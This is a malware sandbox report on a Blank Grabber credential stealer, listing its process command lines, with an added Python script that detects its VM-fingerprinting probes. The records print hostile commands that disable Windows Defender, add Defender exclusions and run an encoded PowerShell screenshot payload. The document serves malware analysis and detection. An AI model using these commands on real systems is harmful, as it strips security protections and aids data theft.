• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:2
Start time:22:15:56
Start date:15/09/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:3
Start time:22:15:56
Start date:15/09/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:5
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:6
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:7
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:8
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:0x7ff6afba0000
File size:447'488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low
Has exited:true

Target ID:9
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
Imagebase:0x7ff6afba0000
File size:447'488 bytes
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low
Has exited:true

Target ID:10
Start time:22:15:57
Start date:15/09/2023
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff667630000
File size:100'352 bytes
MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:11
Start time:22:15:58
Start date:15/09/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:12
Start time:22:15:58
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:13
Start time:22:15:58
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

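The records for Target IDs 13, 14, 16, 17, 20, 21 and 23 above show the sample reading the SMBIOS product UUID (wmic csproduct get uuid), the display adapter's driver description and provider (REG QUERY under the {4D36E968-E325-11CE-BFC1-08002BE10318} key, which is the "Display adapters" device setup class) and the GPU name via WMI. Taken together those are the hardware-identity probes a stealer runs to decide whether it is inside a sandbox or VM. The script below is an added example (not Joe Sandbox or Blank Grabber code) that parses process records in the report's own Key:Value layout and labels the probing command lines; the pattern names, the two-technique threshold and the embedded sample are this example's own constructions.

```python
"""Flag VM/sandbox fingerprinting commands in a Joe Sandbox-style process list.

Added example. Parses blank-line separated 'Key:Value' process records and
labels command lines that probe hardware identity. The pattern table, labels
and threshold are assumptions of this example, not part of Joe Sandbox.
"""
import re
from dataclasses import dataclass

# Device setup class GUID for "Display adapters": DriverDesc / ProviderName
# under it name the GPU driver, which on a VM is the hypervisor's.
DISPLAY_CLASS_GUID = "{4D36E968-E325-11CE-BFC1-08002BE10318}"

# Label -> regex, matched case-insensitively against the whole command line so
# that both the cmd.exe /c "..." wrapper and the spawned child are caught. The
# trailing "2" the report shows after DriverDesc/ProviderName is not matched on.
FINGERPRINT_PATTERNS = {
    "smbios_uuid": re.compile(r"\bwmic\b.*\bcsproduct\b.*\buuid\b", re.I),
    "gpu_name_wmi": re.compile(r"\bwmic\b.*\bwin32_videocontroller\b.*\bname\b", re.I),
    "gpu_driver_registry": re.compile(
        r"\breg\s+query\b.*" + re.escape(DISPLAY_CLASS_GUID)
        + r".*\\(DriverDesc|ProviderName)\b", re.I),
}


@dataclass
class ProcessRecord:
    target_id: int
    path: str
    commandline: str


def parse_records(text: str) -> list[ProcessRecord]:
    """Split blank-line separated blocks; keep only blocks that carry a Target ID."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.strip().partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        if "Target ID" not in fields:
            continue  # e.g. the tail of a record cut off at a page boundary
        records.append(ProcessRecord(int(fields["Target ID"]),
                                     fields.get("Path", ""),
                                     fields.get("Commandline", "")))
    return records


def classify(commandline: str) -> list[str]:
    """Return every fingerprinting label whose pattern matches the command line."""
    return [label for label, rx in FINGERPRINT_PATTERNS.items() if rx.search(commandline)]


def find_fingerprinting(records):
    """(target_id, image name, labels) for each process whose command line matched."""
    hits = []
    for r in records:
        labels = classify(r.commandline)
        if labels:
            hits.append((r.target_id, r.path.rsplit("\\", 1)[-1].lower(), labels))
    return hits


def technique_counts(records) -> dict[str, int]:
    """How many processes used each probing technique."""
    counts: dict[str, int] = {}
    for _, _, labels in find_fingerprinting(records):
        for label in labels:
            counts[label] = counts.get(label, 0) + 1
    return counts


def looks_like_environment_check(records, min_distinct=2) -> bool:
    """Heuristic: two or more distinct hardware-identity probes in one report."""
    return len(technique_counts(records)) >= min_distinct


# Constructed sample: a subset of the records above plus a benign conhost,
# in the report's own layout.
SAMPLE = r"""
Target ID:13
Path:C:\Windows\System32\wbem\WMIC.exe
Commandline:wmic csproduct get uuid

Target ID:14
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

Target ID:15
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Target ID:20
Path:C:\Windows\System32\reg.exe
Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

Target ID:23
Path:C:\Windows\System32\wbem\WMIC.exe
Commandline:wmic path win32_VideoController get name
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for tid, image, labels in find_fingerprinting(recs):
        print(f"target {tid:>3} {image:<12} {', '.join(labels)}")
    print("environment check:", looks_like_environment_check(recs))
```

Matching on the whole command line means a cmd.exe /c wrapper and its reg.exe or WMIC.exe child each produce a hit, which is what you want when hunting in process-creation telemetry where only one of the two may have been logged; de-duplicate on parent/child if you feed it EDR data instead. None of these commands is malicious on its own, so the verdict rests on seeing several distinct probes from one process tree, not on any single match.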
Target ID:24
Start time:22:16:00
Start date:15/09/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:0x7ff7a8120000
File size:273'920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:25
Start time:22:16:00
Start date:15/09/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6bab10000
File size:625'664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:22:16:01
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:22:16:02
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:22:16:03
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
